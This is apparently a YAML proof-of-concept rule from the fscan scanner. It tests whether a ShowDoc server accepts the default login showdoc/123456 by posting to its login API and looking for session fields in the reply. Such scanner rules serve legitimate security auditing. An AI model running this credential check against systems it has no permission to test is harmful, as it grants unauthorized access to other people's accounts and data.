fscan/WebScan/pocs/showdoc-default-password.yml

name: poc-yaml-showdoc-default-password
rules:
  - method: POST
    path: /server/index.php?s=/api/user/login
    body: username=showdoc&password=123456
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(b"uid") && response.body.bcontains(b"groupid") && response.body.bcontains(b"user_token")      
detail:
  author: B1anda0(https://github.com/B1anda0)
  links:
    - https://blog.star7th.com/2016/05/2007.html